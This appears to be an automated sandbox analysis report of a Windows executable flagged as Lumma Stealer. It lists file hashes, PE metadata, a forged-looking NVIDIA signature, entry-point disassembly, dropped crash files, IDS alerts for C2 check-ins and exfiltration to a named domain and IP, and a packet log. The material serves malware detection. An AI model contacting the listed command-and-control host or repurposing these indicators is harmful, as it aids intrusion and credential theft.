                                                                                      • 104.21.112.1
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.6585768723965039
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:0kuFNdFYsyh3oI7Rq6tQXIDcQvc6QcEVcw3cE/9kM+HbHg/5hZAX/d5FMT2SlPkS:AfdFYK0BU/YjhzuiFMZ24IO83A
                                                                                      MD5:B23A8E06A4632EC68E703C702AAA61E9
                                                                                      SHA1:C9D79C61859C6E8EDCEB6207E6D4D057AC0E5BF0
                                                                                      SHA-256:DC46726A4DDE48D22FAC13A5080C9D7DC19C581880E5C39370206BFF1C1D4E4D
                                                                                      SHA-512:55DAC05335CAD3E67CE5E668DB714939C1D504084C0C8B0F96347C8D165CD6D33B6F0956AB15F577EF49D3394759504AE2536C41F451A2054D47B66D7CDB0FF1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.4.5.9.6.5.2.8.8.1.8.0.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.4.5.9.6.5.3.7.4.1.1.7.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.c.5.6.d.f.b.-.f.1.e.8.-.4.6.2.5.-.9.4.b.0.-.f.8.9.9.5.f.b.4.2.e.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.3.7.2.2.2.7.-.0.0.f.b.-.4.9.a.6.-.a.0.7.7.-.6.e.0.2.f.d.1.1.4.a.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.2.2.6.x.4.1.C.Q.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.c.-.0.0.0.1.-.0.0.1.4.-.0.8.7.7.-.5.5.f.1.c.2.7.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.a.d.9.8.0.d.a.0.7.3.9.8.b.7.1.7.a.1.6.6.0.d.f.c.3.3.c.f.8.3.d.0.0.0.0.f.f.f.f.!.0.0.0.0.3.b.c.c.a.d.f.c.c.4.8.c.2.1.1.6.3.8.9.c.5.3.7.1.4.e.3.b.e.0.7.6.5.9.2.7.3.1.b.4.!.h.2.2.6.x.4.1.C.Q.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 14 streams, Mon Jan 27 13:54:13 2025, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):32288
                                                                                      Entropy (8bit):1.7259724286111786
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:5k8E7pFHyn/SJmVzJ0ti77hQzuiM8RsgJZ2p1u1TAerXWI9RWIySb4y0t84Wd/:NOOnldwOWHRspapAer3Ay0tTWd/
                                                                                      MD5:DC336BBA1AABFF4D9C8435F4CB4920C3
                                                                                      SHA1:FBDD6EE50ED0D2A52108566821AC3E04A546F1F3
                                                                                      SHA-256:017B3E4F9C0D9E3FFBAA6305CBD153C74AA1C70C77D8C222814C612D807388E2
                                                                                      SHA-512:EF7282127FDB68DAD96B43F3ED858A4801BFB7331E697097F0E25F350C5318C60783F9D1562A2E916ECA9377C56899F280DDF38766428CCA5A3E9FF3A47CA9E0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:MDMP..a..... ..........g........................d...........................T.......8...........T...............ps......................................................................................................eJ..............GenuineIntel............T.......\......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8402
                                                                                      Entropy (8bit):3.7010235130898055
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJd46x6YNmvSU7agmfkGprx89biVsfh7Wm:R6lXJS6x6YIvSU7agmfkNiufhz
                                                                                      MD5:E44E9FF06F578EA3637ADB5831B00506
                                                                                      SHA1:9DA4933F7878BF9155C01CA67FFD89C84FBB97CE
                                                                                      SHA-256:8B88D09F0DE47A40587B6248F3A6398B5CA9BA13373FDFEC75C9A2530DF917D6
                                                                                      SHA-512:49BBA59092A9468F45AA13B05836FE61073EDE640EBD1B99974553DB5D34AAA96A4BF5328248D3247CA7CB9A75BA3A32B0CF9628E10B50A217FD99348D2C4768
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.6.0.<./.P.i.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4720
                                                                                      Entropy (8bit):4.480857344817235
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsLrJg77aI9F6WpW8VY2Ym8M4Jg83iEFY+q8vh3ik7yzvzId:uIjfLFI7b77VKJXGKBz4bId
                                                                                      MD5:AFE5AA97CE747AE120BE36E3AF1F78B1
                                                                                      SHA1:7363D0EC300046034E50E6510825E4BE4A382032
                                                                                      SHA-256:B0637E476BD9B9746FA53068D3D5B1C3A23C39287FADA5ABBCC153D785482050
                                                                                      SHA-512:9D4197C28AB09C157A91DBDC65959D0DB6CAA6967AD031EE4262774E00DC63B7D225344171F4FC50E1125115D8A7DCFD9C1AC7982DEB3BFC9438929220060DD4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="694376" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.416673673402909
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:Ccifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNW5+:vi58oSWIZBk2MM6AFBYo
                                                                                      MD5:3BEF5D0303B47AAD2E6170BC4F63C236
                                                                                      SHA1:532B7ACDCCB0FC28D83B7CE9EAE46FF8B5E8675C
                                                                                      SHA-256:62AB5F4D836B2ACEC01349010C7879B7EED7D71BA8AB2818C02DC1CF176EC62A
                                                                                      SHA-512:DD0EE1580E3CEDE8460317D107FAAF7D7619341F262D80349D6B5BDD572086DFD7E00BE1EDA79E268BA2CBF991F59CBCEE4355524FBDBD855396DDDDA2135821
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm../..p..............................................................................................................................................................................................................................................................................................................................................bS8.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.677322192663024
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:h226x41CQ6.exe
                                                                                      File size:491'048 bytes
                                                                                      MD5:fc8506934f3f379af5f36cdccb0c17ca
                                                                                      SHA1:3bccadfcc48c2116389c53714e3be076592731b4
                                                                                      SHA256:5bd0a7c399000541ab5f7398af02d5ced96e4f3adcea59a63c35dcf890bdc8de
                                                                                      SHA512:fdf07feaaa7429948fe406d48446bf56eb0b8ffbc28aab0e8c6b07f07efd1b28510145f08018a8b72d242afe2d743ca69e8ef238c1af1ed4dba1389529df96c9
                                                                                      SSDEEP:6144:4SXqWHJut4OcfDdJc2CSe5xyMUq27fqAytMYbUMPFr5pOUkMQZsHyRZJT33oEO:FXqWrOQb2ZUHfqAyTUMLUMQhZ33oEO
                                                                                      TLSH:C6A4120675C0C072E9664A328870DBF19B7CFC344F605EDF33995A7A9FA43C24A1696B
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Nzu..............i.......i.......i.......i..........^.......................#...B.......B.......B.......Rich...................
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x401d29
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6713A8A8 [Sat Oct 19 12:40:08 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:12fb41fe7c2715179030b9cdaa5263a9
                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                      Error Number:-2146869232
                                                                                      Not Before, Not After
                                                                                      • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                                                                      Subject Chain
                                                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                      Version:3
                                                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                      Instruction
                                                                                      call 00007FE240F6D62Dh
                                                                                      jmp 00007FE240F6D0BFh
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push 00000000h
                                                                                      call dword ptr [00414014h]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call dword ptr [00414010h]
                                                                                      push C0000409h
                                                                                      call dword ptr [00414018h]
                                                                                      push eax
                                                                                      call dword ptr [0041401Ch]
                                                                                      pop ebp
                                                                                      ret
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 00000324h
                                                                                      push 00000017h
                                                                                      call dword ptr [00414020h]
                                                                                      test eax, eax
                                                                                      je 00007FE240F6D247h
                                                                                      push 00000002h
                                                                                      pop ecx
                                                                                      int 29h
                                                                                      mov dword ptr [00471088h], eax
                                                                                      mov dword ptr [00471084h], ecx
                                                                                      mov dword ptr [00471080h], edx
                                                                                      mov dword ptr [0047107Ch], ebx
                                                                                      mov dword ptr [00471078h], esi
                                                                                      mov dword ptr [00471074h], edi
                                                                                      mov word ptr [004710A0h], ss
                                                                                      mov word ptr [00471094h], cs
                                                                                      mov word ptr [00471070h], ds
                                                                                      mov word ptr [0047106Ch], es
                                                                                      mov word ptr [00471068h], fs
                                                                                      mov word ptr [00471064h], gs
                                                                                      pushfd
                                                                                      pop dword ptr [00471098h]
                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                      mov dword ptr [0047108Ch], eax
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      mov dword ptr [00471090h], eax
                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                      mov dword ptr [0047109Ch], eax
                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                      mov dword ptr [00470FD8h], 00010001h
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1a6b80x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x720000x1e0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x758000x2628
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x10b8.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x199700x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x198b00x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x140000x118.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x125800x12600ac9ad1c701e7d6a60f117a40bdfced55False0.6130420918367347COM executable for DOS6.652849199056284IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x140000x6cfc0x6e006ad4c3bbd048d271d2404b264ab0f6c2False0.4693536931818182data5.111738586022721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x1b0000x569cc0x56000903254533ed0a6b682e735f437f72d50False0.9944528978924418data7.995099656093306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x720000x1e00x2001a74fae71ecce055ab8978394eed8aa8False0.52734375data4.704363013479242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x730000x10b80x1200f3f166dae9240d335b1dad3fad88f030False0.7322048611111112data6.307172215022896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      .ball0x750000x24000x2400406c6cd69e5c18b4f7e63b50165763c6False0.027452256944444444data0.26840349151112036IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .ball0x780000x24000x2400406c6cd69e5c18b4f7e63b50165763c6False0.027452256944444444data0.26840349151112036IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_MANIFEST0x720600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                      DLLImport
                                                                                      KERNEL32.dllGetSystemFileCacheSize, AddAtomA, VirtualQuery, VirtualQueryEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, RaiseException, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, HeapSize, HeapReAlloc, CloseHandle, CreateFileW, DecodePointer
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Download Network PCAP: filteredfull

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-27T14:54:13.379336+01002056706ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (platformcati .sbs)1192.168.2.7613251.1.1.153UDP
                                                                                      2025-01-27T14:54:13.879270+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749702104.21.112.1443TCP
                                                                                      2025-01-27T14:54:13.879270+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702104.21.112.1443TCP
                                                                                      2025-01-27T14:54:14.198569+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749702104.21.112.1443TCP
                                                                                      2025-01-27T14:54:14.198569+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749702104.21.112.1443TCP
                                                                                      2025-01-27T14:54:15.356568+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749703104.21.112.1443TCP
                                                                                      2025-01-27T14:54:15.356568+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703104.21.112.1443TCP
                                                                                      2025-01-27T14:54:15.863766+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749703104.21.112.1443TCP
                                                                                      2025-01-27T14:54:15.863766+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749703104.21.112.1443TCP
                                                                                      2025-01-27T14:54:16.739157+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749705104.21.112.1443TCP
                                                                                      2025-01-27T14:54:16.739157+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749705104.21.112.1443TCP
                                                                                      2025-01-27T14:54:40.121324+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749838104.21.112.1443TCP
                                                                                      2025-01-27T14:54:40.121324+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749838104.21.112.1443TCP
                                                                                      2025-01-27T14:54:41.576040+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749849104.21.112.1443TCP
                                                                                      2025-01-27T14:54:41.576040+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749849104.21.112.1443TCP
                                                                                      2025-01-27T14:54:43.214282+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749860104.21.112.1443TCP
                                                                                      2025-01-27T14:54:43.214282+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749860104.21.112.1443TCP
                                                                                      2025-01-27T14:54:45.046611+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749860104.21.112.1443TCP
                                                                                      2025-01-27T14:54:46.133395+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749871104.21.112.1443TCP
                                                                                      2025-01-27T14:54:46.133395+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749871104.21.112.1443TCP
                                                                                      2025-01-27T14:54:48.988318+01002056707ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI)1192.168.2.749892104.21.112.1443TCP
                                                                                      2025-01-27T14:54:48.988318+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749892104.21.112.1443TCP
                                                                                      2025-01-27T14:54:49.797125+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749892104.21.112.1443TCP
                                                                                      • Total Packets: 103
                                                                                      • 443 (HTTPS)
                                                                                      • 53 (DNS)
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 27, 2025 14:54:13.401757002 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:13.401819944 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:13.401925087 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:13.404598951 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:13.404632092 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:13.879192114 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:13.879270077 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:13.912906885 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:13.912961960 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:13.913201094 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:13.955409050 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.076440096 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.076440096 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.076634884 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.198585987 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.198632956 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.198667049 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.198717117 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.198754072 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.198798895 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.198852062 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.198852062 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.198904037 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.220077991 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.220114946 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.220160961 CET49702443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.220175982 CET44349702104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.881988049 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.882024050 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:14.882112026 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.883877039 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:14.883891106 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.356477022 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.356568098 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.358009100 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.358021021 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.358376980 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.360390902 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.360500097 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.360523939 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.863789082 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.863836050 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.863938093 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.863970995 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.864006042 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.864041090 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.864063025 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.864097118 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.864304066 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.867448092 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.868613005 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.868640900 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.868673086 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.868680954 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.868819952 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.952261925 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.952413082 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.952445984 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.952568054 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:15.952577114 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.952807903 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.952809095 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.953041077 CET49703443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:15.953059912 CET44349703104.21.112.1192.168.2.7
                                                                                      Jan 27, 2025 14:54:16.266978979 CET49705443192.168.2.7104.21.112.1
                                                                                      Jan 27, 2025 14:54:16.267030001 CET44349705104.21.112.1192.168.2.7
